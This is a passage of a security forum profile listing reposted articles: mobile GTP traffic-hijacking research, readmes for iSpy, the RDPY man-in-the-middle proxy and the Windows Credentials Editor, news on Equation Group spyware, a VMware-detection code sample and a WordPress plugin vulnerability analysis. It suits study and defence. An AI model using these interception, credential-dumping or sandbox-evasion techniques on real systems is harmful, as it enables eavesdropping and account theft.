Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. The research: Mobile Internet traffic hijacking via GTP and GRX Most users assume that mobile network access is much safer because a big mobile-telecoms provider will protect subscribers. Unfortunately, as practice shows, mobile Internet is a great opportunity for the attacker. Positive Technologies experts have detected vulnerabilities in the infrastructure of mobile networks, allowing an attacker to intercept unencrypted GPRS traffic, spoof the data, block the Internet access, and determine the subscriber's location. Not only cell phones are exposed to threats, but also special devices connected to 2G/3G/4G networks via modems: ATM machines and payment terminals, remote transport and industrial equipment control systems, telemetry and monitoring tools, etc. Operators of mobile services usually encrypt GPRS traffic between the mobile terminal (smartphone, modem) and the Serving GPRS Support Node (SGSN) using GEA-1/2/3 encryption algorithms, making it difficult to intercept and decrypt information. In order to bypass this restriction an attacker can access the operator's basic network where the data is not protected by authentication mechanisms. Routing nodes (or gateway nodes) called GGSN are a weak point. We can easily find the required nodes using Shodan.io search engine for Internet-connected systems controlling industrial equipment. Vulnerable nodes have open GTP ports which allows attackers to set up the connection and then encapsulate GTP control packets into the created tunnel. If parameters were selected properly GGSN will take them as packets from legitimate devices within the operator's network. The described above GTP protocol in no way should be seen from the Internet. In practice, however, things are often quite different: There are more than 207,000 devices with open GTP ports all over the global Internet. More than five hundred of them are components of cellular network architecture and respond to the request for a connection. Another benefit for attackers is that GTP is not the only protocol used to manage the detected hosts. FTP, SSH, Web, etc. are also used for management purposes. An attacker can connect to the node of a mobile network operator by exploiting vulnerabilities (for example, default passwords) in these interfaces. Experimental search through the Shodan site reveals some vulnerable devices, including ones with open Telnet and turned off password authentication. An attacker can perform an intrusion into the network of the operator in the Central African Republic by connecting to this device and implementing the required settings. Having access to the network of any operator, the attacker will automatically get access to the GRX network and other operators of mobile services. One single mistake made by one single operator in the world creates this opportunity for attack to many other mobile networks. Among the various ways of using the compromised boundary host we should note the following: disconnection of subscribers from the Internet or blocking their access to the Internet; connecting to the Internet with the credentials of a legitimate user and at the expense of others; listening to the traffic of the victim and fishing attacks. An attacker can also get the subscriber's ID (IMSI) and monitor the subscriber's location worldwide until the SIM card is changed. Let us describe in more detail some of the security threats. Internet at the expense of others Goal. The exhaustion of the subscriber's account and use of the connection for illegal purposes. Attack vector: An attacker conducts attacks from the GRX network or the operator's network. Description. The attack is based on sending the “Create PDP context request” packets with the IMSI of a subscriber known in advance. Thus, the subscriber's credentials are used to establish connection. Unsuspecting subscriber will get a huge bill. It is possible to establish connection via the IMSI of a non-existent subscriber, as subscriber authorization is performed at the stage of connecting to SGSN and GGSN receives already verified connections. Since the SGSN is compromised, no verification is carried out. Result. An attacker can connect to the Internet with the credentials of a legitimate user. Data interception Goal. To listen to the traffic of the victim and conduct a fishing attack. Attack vector: An attacker conducts attacks from the GRX network or the operator's network. Description. An attacker can intercept data sent between the subscriber's device and the Internet by sending an “Update PDP Context Request” message with spoofed GSN addresses to SGSN and GGSN. This attack is an analogue of the ARP Spoofing attack at the GTP level. Result. Listening to traffic or spoofing traffic from the victim and disclosure of sensitive data. DNS tunneling Goal. To get non-paid access to the Internet from the subscriber's mobile station. Attack vector: The attacker is the subscriber of a mobile phone network and acts through a mobile phone. Description. This is a well-known attack vector, rooted in the days of dial-up, but the implementation of low-price and fast dedicated Internet access made it less viable. However, this attack can be used in mobile networks, for example, in roaming when prices for mobile Internet are unreasonably high and the data transfer speed is not that important (for example, for checking email). The point of this attack is that some operators do not rate DNS traffic, usually in order to redirect the subscriber to the operator's webpage for charging the balance. An attacker can use this vulnerability by sending special crafted requests to the DNS server; to get access one needs a specialized host on the Internet. Result. Getting non-paid access to the Internet at the expense of mobile operator. Substitution of DNS for GGSN Goal. To listen to the traffic of the victim and conduct a fishing attack. Attack vector: An attacker acts through the Internet. Description. If an attacker gets access to GGSN (which is quite possible as we could see), the DNS address can be spoofed with the attacker's address and all the subscriber's traffic will be redirected through the attacker's host. Thus, listening to all the mobile traffic of the subscriber is possible. Result. An ability to listen to traffic or spoof traffic from all subscribers and then gather confidential data to engage it in fishing attacks. Some of the attacks can not be performed if the equipment is configured properly. Still the results of the research made by Positive Technologies suggest that misconfiguration is a common problem in the telecommunications sphere. Vendors often leave some services enabled while these services should be disabled on this equipment, which gives additional opportunities to attackers. Due to the large number of nodes it is recommended to automate the control process using specific tools such as MaxPatrol. How to Protect Yourself Security measures required to protect against such attacks include proper configuration of equipment, utilizing firewalls at the GRX network edge, using 3GPP TS 33.210 recommendations to configure the security settings within the PS Core network, security monitoring of the perimeter as well as developing security compliances for the equipment and performing regular compliance management tasks. Many people rely on new communication standards that include new safety technologies. However, despite the development of such standards (3G, 4G) we cannot completely abandon the use of old generation networks (2G). The reason is the specifics of the implementation of mobile networks and the fact that the 2G base stations have better coverage as well as the fact that 3G networks use their infrastructure. LTE still uses the GTP protocol and therefore the necessary protection measures will be relevant in the foreseeable future. The results of this research were gathered by Positive Technologies experts in 2013 and 2014 during consulting on security analysis for several large mobile operators. For detailed report on Vulnerabilities of mobile Internet (GPRS), please visit Positive Technologies official site: www.ptsecurity.com/download/Vulnerabilities_of_Mobile_Internet.pdf ?????: Positive Research ?? 12:54 AM Sursa: http://blog.ptsecurity.com/2015/02/the-research-mobile-internet-traffic.html
  2. VULNERABILITIES OF MOBILE INTERNET (GPRS) Dmitry Kurbatov Sergey Puzankov Pavel Novikov 2014 Contents 1. Introduction 2. Summary 3. M obile network scheme 4. GTP protocol 5. Searching for mobile operator’s facilities on the Internet 6. Threats 6.1. IMSI brute force 6.2. T he disclosure of subscriber’s data via IMSI 6.3. Dis connection of authorized subscribers from the Internet 6.4. B locking the connection to the Internet 6.5. Internet at the expense of others 6.6. D ata interception 6.7. DN S tunneling 6.8. Substitution of DNS for GGSN 7. C onclusion and recommendations Download: http://www.ptsecurity.com/download/Vulnerabilities_of_Mobile_Internet.pdf
  3. iSpy Assessment Framework iSpy aims to be your one-stop-shop for reverse engineering and dynamic analysis of iOS applications. Current Release The current release is a developer preview; code is subject to change, and will be unstable. However, we appreciate code contributions, feature requests, and bug reports. We currently do not have binary releases, stay tuned! Instructions Compiling and Installing iSpy Injecting iSpy into Apps Features Easy to use Web GUI Class dumps Instance tracking Automatic jailbreak-detection bypasses Automatic SSL certificate pinning bypasses Re-implemented objc_msgSend for logging and tracing function calls in realtime Cycript integration; access Cycript from your browser! Anti-anti-method swizzling Automatic detection of vulnerable function calls Easy to use soft-breakpoints More on the way! Sursa: https://github.com/BishopFox/iSpy
  4. Big-brand hard disk firmware worldwide RIDDLED with NSA SPY KIT Kaspersky: 'Equation Group' attacked 'high value targets' 17 Feb 2015 at 01:57, Darren Pauli America's National Security Agency (NSA) has infected hard disk firmware with spyware in a campaign valued as highly as Stuxnet and dating back at least 14 years, and possibly up to two decades, according to an analysis by Kaspersky labs and subsequent reports. The campaign infected possibly tens of thousands of computers in telecommunications providers, governments, militaries, utilities, and mass media organisations among others in more than 30 countries. The agency is said to have compromised hard drive firmware for more than a dozen top brands, including Seagate, Western Digital, IBM, Toshiba, Samsung and Maxtor, Kaspersky researchers revealed. Reuters reports sources formerly working with the NSA confirmed the agency was responsible for the attacks, which Kaspersky doesn't lay at the feet of the agency. Kaspersky's analysis says the NSA made a breakthrough by infecting hard disk firmware with malware known only as nls_933w.dll capable of persisting across machine wipes to re-infect targeted systems. Researchers said the actors dubbed 'The Equation Group' had access to the firmware source code and flexed their full remote access control over infected machines only for high value targets. "The Equation group is probably one of the most sophisticated cyber attack groups in the world," Kaspersky bods said in an advisory. "This is an astonishing technical accomplishment and is testament to the group's abilities." "For many years they have interacted with other powerful groups, such as the Stuxnet and Flame groups; always from a position of superiority, as they had access to exploits earlier than the others." It called the campaign the "Death Star" of the malware universe, and said (PDF) the Equation moniker was given based on the attackers' "love for encryption algorithms and obfuscation strategies". Reuters sources at the NSA said the agency would sometimes pose as software developers to trick manufacturers into supplying source code, or could simply keep a copy of the data when the agency did official code audits on behalf of the Pentagon. Western Digital said it did not share source code with the agency. It was unknown if other named hard drive manufacturers had done so. Vectors The agency spread its spy tools through compromised watering hole jihadist sites and by intercepting and infecting removal media including CDs. The latter vector was discovered in 2009 when a scientist named Grzegorz Brzeczyszczykiewicz received a CD sent by a unnamed prestigious international scientific conference he had just attended in Houston. Kaspersky said that CD contained three exploits, of which two were zero day, sent by the "almost omnipotent" attack group. Another method included a custom malware dubbed Fanny which used two zero day flaws identical to those executed later in Stuxnet. Its main purpose, Kaspersky's researchers said, was to map air-gap networks using a unique USB-based command and control mechanism which could pass data back and forth from air-gapped networks. This researchers said indicated the authors worked in collaboration with those behind the Natanz uranium plant weapon and further shored-up claims the NSA was behind the detailed attacks. Other trojans used in the prolonged and wipe spread attacks were dubbed Equationlaser; Equationdrug; Doublefantasy; Triplefantasy, and Grayfish. It detailed the trojans in a document: EQUATIONDRUG – A very complex attack platform used by the group on its victims. It supports a module plugin system, which can be dynamically uploaded and unloaded by the attackers. DOUBLEFANTASY – A validator-style Trojan, designed to confirm the target is the intended one. If the target is confirmed, they get upgraded to a moresophisticated platform such as EQUATIONDRUG or GRAYFISH. EQUESTRE – Same as EQUATIONDRUG. TRIPLEFANTASY – Full-featured backdoor sometimes used in tandem with GRAYFISH. Looks like an upgrade of DOUBLEFANTASY, and is possibly a more recent validator-style plugin. GRAYFISH – The most sophisticated attack platform from the EQUATION Group. It resides completely in the registry, relying on a bootkit to gain execution at OS startup. FANNY – A computer worm created in 2008 and used to gather information about targets in the Middle East and Asia. Some victims appear to have been upgraded first to DoubleFantasy, and then to the EQUATIONDRUG system. Fanny used exploits for two zero-day vulnerabilities which were later discovered with Stuxnet. EQUATIONLASER – An early implant from the EQUATION group, used around2001-2004. Compatible with Windows 95/98, and created sometime between DOUBLEFANTASY and EQUATIONDRUG. Kaspersky has include indicators of compromise for the malware strains and will publish an update in coming days, it said. ® Sursa: http://www.theregister.co.uk/2015/02/17/kaspersky_labs_equation_group/
  5. CARBANAK APTTHE GREAT BANK ROBBERY By Kaspersky Table of contents1. Executive Summary...........................................3 2. Analysis...................................................5 2.1 Infection and Transmission.............................5 2.2 Malware Analysis – Backdoor.Win32.Carbanak...........7 2.3 Lateral movement tools............ 18 2.4 Command and Control (C2) Servers........... 19 3. Conclusions.................................................23 APPENDIX 1: C2 protocol decoders................. 24 APPENDIX 2: BAT file to detect infection.............. 27 APPENDIX 3: IOC hosts.............. 28 APPENDIX 4: Spear phishing................. 34 APPENDIX 5: MD5 hashes of Carbanak samples............36 Download: https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
  6. RDPY Remote Desktop Protocol in twisted python. RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client and server side). RDPY is built over the event driven network engine Twisted. RDPY provides the following RDP and VNC binaries : RDP Man In The Middle proxy which record session RDP Honeypot RDP screenshoter RDP client VNC client VNC screenshoter RSS Player Build RDPY is fully implemented in python, except the bitmap decompression algorithm which is implemented in C for performance purposes. Dependencies Dependencies are only needed for pyqt4 binaries : rdpy-rdpclient rdpy-rdpscreenshot rdpy-vncclient rdpy-vncscreenshot rdpy-rssplayer Linux Example for Debian based systems : sudo apt-get install python-qt4 Windows [TABLE=width: 728] [TR] [TH]x86[/TH] [TH]x86_64[/TH] [/TR] [TR] [TD]PyQt4[/TD] [TD]PyQt4[/TD] [/TR] [TR=bgcolor: #F8F8F8] [TD]PyWin32[/TD] [TD]PyWin32[/TD] [/TR] [/TABLE] Build $ git clone https://github.com/citronneur/rdpy.git rdpy $ pip install twisted pyopenssl qt4reactor service_identity rsa $ python rdpy/setup.py install Or use PIP: $ pip install rdpy For virtualenv, you will need to link the qt4 library to it: $ ln -s /usr/lib/python2.7/dist-packages/PyQt4/ $VIRTUAL_ENV/lib/python2.7/site-packages/ $ ln -s /usr/lib/python2.7/dist-packages/sip.so $VIRTUAL_ENV/lib/python2.7/site-packages/ RDPY Binaries RDPY comes with some very useful binaries. These binaries are linux and windows compatible. rdpy-rdpclient rdpy-rdpclient is a simple RDP Qt4 client. $ rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_ouput_file] [...] XXX.XXX.XXX.XXX[:3389] You can use rdpy-rdpclient in a Recorder Session Scenario, used in rdpy-rdphoneypot. rdpy-vncclient rdpy-vncclient is a simple VNC Qt4 client . $ rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900] rdpy-rdpscreenshot rdpy-rdpscreenshot saves login screen in file. $ rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389] rdpy-vncscreenshot rdpy-vncscreenshot saves the first screen update in file. $ rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900] rdpy-rdpmitm rdpy-rdpmitm is a RDP proxy allows you to do a Man In The Middle attack on RDP protocol. Record Session Scenario into rss file which can be replayed by rdpy-rssplayer. $ rdpy-rdpmitm.py -o output_dir [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] [-r (for XP or server 2003 client)] target_host[:target_port] Output directory is used to save the rss file with following format (YYYYMMDDHHMMSS_ip_index.rss) The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer. The CredSSP security layer is planned for an upcoming release. If one of both parameters are omitted, the server use standard RDP as security layer. rdpy-rdphoneypot rdpy-rdphoneypot is an RDP honey Pot. Use Recorded Session Scenario to replay scenario through RDP Protocol. $ rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_path_N The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer. The CredSSP security layer is planned for an upcoming release. If one of both parameters are omitted, the server use standard RDP as security layer. You can specify more than one files to match more common screen size. rdpy-rssplayer rdpy-rssplayer is use to replay Record Session Scenario (rss) files generates by either rdpy-rdpmitm or rdpy-rdpclient binaries. $ rdpy-rssplayer.py rss_file_path RDPY Qt Widget RDPY can also be used as Qt widget through rdpy.ui.qt4.QRemoteDesktop class. It can be embedded in your own Qt application. qt4reactor must be used in your app for Twisted and Qt to work together. For more details, see sources of rdpy-rdpclient. RDPY library In a nutshell RDPY can be used as a protocol library with a twisted engine. Simple RDP Client [FONT=Helvetica Neue]from rdpy.protocol.rdp import rdp class MyRDPFactory(rdp.ClientFactory): def clientConnectionLost(self, connector, reason): reactor.stop() def clientConnectionFailed(self, connector, reason): reactor.stop() def buildObserver(self, controller, addr): class MyObserver(rdp.RDPClientObserver) def onReady(self): """ @summary: Call when stack is ready """ #send 'r' key self._controller.sendKeyEventUnicode(ord(unicode("r".toUtf8(), encoding="UTF-8")), True) #mouse move and click at pixel 200x200 self._controller.sendPointerEvent(200, 200, 1, true) def onUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data): """ @summary: Notify bitmap update @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m destLeft: xmin position @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m destTop: ymin position @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m destRight: xmax position because RDP can send bitmap with padding @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m destBottom: ymax position because RDP can send bitmap with padding @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m width: width of bitmap @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m height: height of bitmap @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m bitsPerPixel: number of bit per pixel @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m isCompress: use RLE compression @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m data: bitmap data """ def onClose(self): """ @summary: Call when stack is close """ return MyObserver(controller) from twisted.internet import reactor reactor.connectTCP("XXX.XXX.XXX.XXX", 3389), MyRDPFactory()) reactor.run()[/FONT] Simple RDP Server [FONT=Helvetica Neue]from rdpy.protocol.rdp import rdp class MyRDPFactory(rdp.ServerFactory): def buildObserver(self, controller, addr): class MyObserver(rdp.RDPServerObserver) def onReady(self): """ @summary: Call when server is ready to send and receive messages """ def onKeyEventScancode(self, code, isPressed): """ @summary: Event call when a keyboard event is catch in scan code format @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m code: scan code of key @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m isPressed: True if key is down @[URL="https://rstforums.com/forum/members/see/"]see[/URL]: rdp.RDPServerObserver.onKeyEventScancode """ def onKeyEventUnicode(self, code, isPressed): """ @summary: Event call when a keyboard event is catch in unicode format @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m code: unicode of key @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m isPressed: True if key is down @[URL="https://rstforums.com/forum/members/see/"]see[/URL]: rdp.RDPServerObserver.onKeyEventUnicode """ def onPointerEvent(self, x, y, button, isPressed): """ @summary: Event call on mouse event @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m x: x position @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m y: y position @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m button: 1, 2 or 3 button @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m isPressed: True if mouse button is pressed @[URL="https://rstforums.com/forum/members/see/"]see[/URL]: rdp.RDPServerObserver.onPointerEvent """ def onClose(self): """ @summary: Call when human client close connection @[URL="https://rstforums.com/forum/members/see/"]see[/URL]: rdp.RDPServerObserver.onClose """ return MyObserver(controller) from twisted.internet import reactor reactor.listenTCP(3389, MyRDPFactory()) reactor.run()[/FONT] Simple VNC Client [FONT=Helvetica Neue]from rdpy.protocol.rfb import rfb class MyRFBFactory(rfb.ClientFactory): def clientConnectionLost(self, connector, reason): reactor.stop() def clientConnectionFailed(self, connector, reason): reactor.stop() def buildObserver(self, controller, addr): class MyObserver(rfb.RFBClientObserver) def onReady(self): """ @summary: Event when network stack is ready to receive or send event """ def onUpdate(self, width, height, x, y, pixelFormat, encoding, data): """ @summary: Implement RFBClientObserver interface @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m width: width of new image @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m height: height of new image @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m x: x position of new image @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m y: y position of new image @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m pixelFormat: pixefFormat structure in rfb.message.PixelFormat @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m encoding: encoding type rfb.message.Encoding @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m data: image data in accordance with pixel format and encoding """ def onCutText(self, text): """ @summary: event when server send cut text event @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m text: text received """ def onBell(self): """ @summary: event when server send biiip """ def onClose(self): """ @summary: Call when stack is close """ return MyObserver(controller) from twisted.internet import reactor reactor.connectTCP("XXX.XXX.XXX.XXX", 3389), MyRFBFactory()) reactor.run()[/FONT] Sursa: https://github.com/citronneur/rdpy
  7. Windows Credentials Editor (WCE) – List, Add & Change Logon Sessions Windows Credentials Editor (WCE) is a security tool to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets). This tool can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.), obtain Kerberos tickets and reuse them in other Windows or Unix systems and dump cleartext passwords entered by users at logon. WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing. It supports Windows XP, 2003, Vista, 7, 2008 and Windows 8. Features Perform Pass-the-Hash on Windows ‘Steal’ NTLM credentials from memory (with and without code injection) ‘Steal’ Kerberos Tickets from Windows machines Use the ‘stolen’ kerberos Tickets on other Windows or Unix machines to gain access to systems and services Dump cleartext passwords stored by Windows authentication packages WCE is aimed at security professionals and penetration testers. It is basically a post-exploitation tool to ‘steal’ and reuse NTLM hashes, Kerberos tickets and plaintext passwords which can then be used to compromise other machines. Under certain circumstances, WCE can allow you to compromise the whole Windows domain after compromising only one server or workstation. You can download WCE here: WCE v1.42beta (32-bit) WCE v1.42beta (64-bit) Or read more here. Sursa: http://www.darknet.org.uk/2015/02/windows-credentials-editor-wce-list-add-change-logon-sessions/
  8. Vmware Detection Ladies and gentleman – I give you yet another case of VMware detection. Unfortunately, this only works for VMware. A friend of mine, one Aaron Yool told of me a way to detect VMware via the use of privileged instructions. Specifically the “IN” instruction. This instruction is used for reading values from I/O ports. What the heck is that? According to the IA32 manual, I/O ports are created in system hardware by circuity that decodes the control, data, and address pins on the processor. These I/O ports are then configured to communicate with peripheral devices. An I/O port can be an input port, an output port, or a bidirectional port. Some I/O ports are used for transmitting data, such as to and from the transmit and receive registers, respectively, of a serial interface device. Other I/O ports are used to control peripheral devices, such as the control registers of a disk controller. Dry material huh? That’s the Intel manual for you. Normally you can’t execute this instruction on Windows in user mode – its a SYSTEM instruction like HLT which are reserved for ring 0. On VMware however, you can call it from ring 3. What can be done if a user mode program and run system level instructions? The sky is the limit, but think rootkit without admin. Pretty wicked stuff. Is this the case here? No, not yet anyways. For now though, we have here a simple way of checking to see if we’re inside VMWare, POC included. We’re using SEH (Structured Exception Handling) here in case Windows complains about the instruction being privileged. Who here likes code? I do! // ------------------------------------------------------------------------------// THE BEER-WARE LICENSE (Revision 43):// <aaronryool@gmail.com> wrote this file. As long as you retain this notice you // can do whatever you want with this stuff. If we meet some day, and you think // this stuff is worth it, you can buy me a beer in return // ------------------------------------------------------------------------------ #include <iostream> #include <windows.h> unsigned vmware(void) { __asm{ mov eax, 0x564d5868 mov cl, 0xa mov dx, 0x5658 in eax, dx cmp ebx, 0 jne matrix xor eax, eax ret matrix: mov eax, 1}; } int seh_filter(unsigned code, struct _EXCEPTION_POINTERS* ep) { return EXCEPTION_EXECUTE_HANDLER; } int _tmain(int a, _TCHAR* argv[]) { __try { if(vmware()) goto matrix; } __except(seh_filter(GetExceptionCode(), GetExceptionInformation())) { goto stage2; } stage2: std::cout << "Isn't real life boring?"<<std::endl; exit(0); matrix: std::cout << "The Matrix haz you Neo..."<<std::endl; exit(1); } PoC pic: Happy hacking! Sursa: Vmware Detection « Joe's Security Blog
  9. Analysis of the Fancybox-For-WordPress Vulnerability By Marc-Alexandre Montpas on February 16, 2015 We were alerted last week of a malware outbreak affecting WordPress sites using version 3.0.2 and lower of the fancybox-for-wordpress plugin. As announced, here are some of the details explaining how attackers could use this vulnerability to inject malicious iframes on websites using this plugin. Technical details This vulnerability exploited a somewhat well-known attack vector amongst WordPress plugins: unprotected “admin_init” hooks. As “admin_init” hooks can be called by anyone visiting either /wp-admin/admin-post.php or /wp-admin/admin-ajax.php, this snippet could be used by remote attackers to change the plugin’s “mfbfw”option with any desired content. This got us asking ourselves, what was this option used for? We found that this option was being used in many places within the plugins codebase. The one that caught our attention was inside the mfbfw_init() function. This basically displays jQuery scripts configured to work with parameters that were set up earlier, in mfbfw_admin_options(). As you can see from the above picture, the $settings array is not sanitized before being output to the client, which means an attacker, using the unprotected “admin_init” hook, could inject malicious Javascript payloads into every page of a vulnerable website, such as the “203koko” iframe injection we presented last week. Sursa: http://blog.sucuri.net/2015/02/analysis-of-the-fancybox-for-wordpress-vulnerability.html
  10. Memex - DARPA's search engine for the Dark Web by Mark Stockley on February 16, 2015 | 3 Comments Anyone who used the World Wide Web in the nineties will know that web search has come a long way. Sure, it was easy to get more search results than you knew what to do with in 1999 but it was really hard to get good ones. What Google did better than Alta Vista, HotBot, Yahoo and the others at the dawn of the millennium was to figure out which search results were the most relevant and respected. And so it's been ever since - search engines have become fast, simple interfaces that compete based on relevance and earn money from advertising. Meanwhile, the methods for finding things to put in the search results have remained largely the same - you either tell the search engines your site exists or they find it by following a link on somebody else's website. That business model has worked extremely well but there's one thing that it does not excel at - depth. If you don't declare your site's existence and nobody links to it, it doesn't exist - in search engine land at least. Google's stated aim may be to organize the world's information and make it universally accessible and useful but it hasn't succeeded yet. That's not just because it's difficult, it's also because Google is a business and there isn't a strong commercial imperative for it to index everything. Estimates of how much of the web has been indexed vary wildly (I've seen figures of 0.04% and 76% so we can perhaps narrow it down to somewhere between almost none and almost all) but one thing is sure, there's enough stuff that hasn't been indexed that it's got it's own name - the Deep Web. It's not out of the question to suggest that the part of the web that hasn't been indexed is actually bigger than the part that has. A subset of it - the part hosted on Tor Hidden Services and referred to as the Dark Web - is very interesting to those in law enforcement. There are all manner of people, sites and services that operate over the web that would rather not appear in your Google search results. If you're a terrorist, paedophile, gun-runner, drug dealer, sex trafficker or serious criminal of that ilk then the shadows of the Deep Web, and particularly the Dark Web, offer a safer haven then the part occupied by, say, Naked Security or Wikipedia. Enter Memex, brainchild of the boffins at DARPA, the US government agency that built the internet (then ARPANET). DARPA describes Memex as a set of search tools that are better suited to government (presumably law enforcement and intelligence) use than commercial search engines. Whereas Google and Bing are designed to be good-enough systems that work for everyone, Memex will end up powering domain-specific searches that are the very best solution for specific narrow interests (such as certain types of crime.) Today's web searches use a centralized, one-size-fits-all approach that searches the internet with the same set of tools for all queries. While that model has been wildly successful commercially, it does not work well for many government use cases. The goal is for users to ... quickly and thoroughly organize subsets of information based on individual interests ... and to improve the ability of military, government and commercial enterprises to find and organize mission-critical publically [sic] available information on the internet. Although Memex will eventually have a very broad range of applications, the project's initial focus is on tackling human trafficking and slavery. According to DARPA, human trafficking has a significant Dark Web presence in the form of forums, advertisements, job postings and hidden services(anonymous sites available via Tor). Memex has been available to a few law enforcement agencies for about a year and has already been used with some success. In September 2014, sex trafficker Benjamin Gaston was sentenced to a minimum of 50 years in prison having been found guilty of "Sex Trafficking, as well as Kidnapping, Criminal Sexual Act, Rape, Assault, and Sex Abuse - all in the First Degree". Scientific American reports that Memex was in the thick of it: A key weapon in the prosecutor's arsenal, according to the NYDA's Office: an experimental set of internet search tools the US Department of Defense is developing to help catch and lock up human traffickers. The journal also reports that Memex is used by the New York County District Attorney's Office in every case pursued by its Human Trafficking Response Unit, and it has played a role in generating at least 20 active sex trafficking investigations. If Memex carries on like this then we'll have to think of a new name for the Dark Web. Sursa: https://nakedsecurity.sophos.com/2015/02/16/memex-darpas-search-engine-for-the-dark-web/
  11. Russian researchers expose breakthrough U.S. spying program BY JOSEPH MENN SAN FRANCISCO Mon Feb 16, 2015 5:10pm EST (Reuters) - The U.S. National Security Agency has figured out how to hide spying software deep within hard drives made by Western Digital, Seagate, Toshiba and other top manufacturers, giving the agency the means to eavesdrop on the majority of the world's computers, according to cyber researchers and former operatives. That long-sought and closely guarded ability was part of a cluster of spying programs discovered by Kaspersky Lab, the Moscow-based security software maker that has exposed a series of Western cyberespionage operations. Kaspersky said it found personal computers in 30 countries infected with one or more of the spying programs, with the most infections seen in Iran, followed by Russia, Pakistan, Afghanistan, China, Mali, Syria, Yemen and Algeria. The targets included government and military institutions, telecommunication companies, banks, energy companies, nuclear researchers, media, and Islamic activists, Kaspersky said. (reut.rs/1L5knm0) The firm declined to publicly name the country behind the spying campaign, but said it was closely linked to Stuxnet, the NSA-led cyberweapon that was used to attack Iran's uranium enrichment facility. The NSA is the agency responsible for gathering electronic intelligence on behalf of the United States. A former NSA employee told Reuters that Kaspersky's analysis was correct, and that people still in the intelligence agency valued these spying programs as highly as Stuxnet. Another former intelligence operative confirmed that the NSA had developed the prized technique of concealing spyware in hard drives, but said he did not know which spy efforts relied on it. NSA spokeswoman Vanee Vines declined to comment. Kaspersky published the technical details of its research on Monday, which should help infected institutions detect the spying programs, some of which trace back as far as 2001. The disclosure could further hurt the NSA's surveillance abilities, already damaged by massive leaks by former contractor Edward Snowden. Snowden's revelations have hurt the United States' relations with some allies and slowed the sales of U.S. technology products abroad. The exposure of these new spying tools could lead to greater backlash against Western technology, particularly in countries such as China, which is already drafting regulations that would require most bank technology suppliers to proffer copies of their software code for inspection. Peter Swire, one of five members of U.S. President Barack Obama's Review Group on Intelligence and Communications Technology, said the Kaspersky report showed that it is essential for the country to consider the possible impact on trade and diplomatic relations before deciding to use its knowledge of software flaws for intelligence gathering. "There can be serious negative effects on other U.S. interests," Swire said. TECHNOLOGICAL BREAKTHROUGH According to Kaspersky, the spies made a technological breakthrough by figuring out how to lodge malicious software in the obscure code called firmware that launches every time a computer is turned on. Disk drive firmware is viewed by spies and cybersecurity experts as the second-most valuable real estate on a PC for a hacker, second only to the BIOS code invoked automatically as a computer boots up. "The hardware will be able to infect the computer over and over," lead Kaspersky researcher Costin Raiu said in an interview. Though the leaders of the still-active espionage campaign could have taken control of thousands of PCs, giving them the ability to steal files or eavesdrop on anything they wanted, the spies were selective and only established full remote control over machines belonging to the most desirable foreign targets, according to Raiu. He said Kaspersky found only a few especially high-value computers with the hard-drive infections. Kaspersky's reconstructions of the spying programs show that they could work in disk drives sold by more than a dozen companies, comprising essentially the entire market. They include Western Digital Corp, Seagate Technology Plc, Toshiba Corp, IBM, Micron Technology Inc and Samsung Electronics Co Ltd. Western Digital, Seagate and Micron said they had no knowledge of these spying programs. Toshiba and Samsung declined to comment. IBM did not respond to requests for comment. GETTING THE SOURCE CODE Raiu said the authors of the spying programs must have had access to the proprietary source code that directs the actions of the hard drives. That code can serve as a roadmap to vulnerabilities, allowing those who study it to launch attacks much more easily. "There is zero chance that someone could rewrite the [hard drive] operating system using public information," Raiu said. Concerns about access to source code flared after a series of high-profile cyberattacks on Google Inc and other U.S. companies in 2009 that were blamed on China. Investigators have said they found evidence that the hackers gained access to source code from several big U.S. tech and defense companies. It is not clear how the NSA may have obtained the hard drives' source code. Western Digital spokesman Steve Shattuck said the company "has not provided its source code to government agencies." The other hard drive makers would not say if they had shared their source code with the NSA. Seagate spokesman Clive Over said it has "secure measures to prevent tampering or reverse engineering of its firmware and other technologies." Micron spokesman Daniel Francisco said the company took the security of its products seriously and "we are not aware of any instances of foreign code." According to former intelligence operatives, 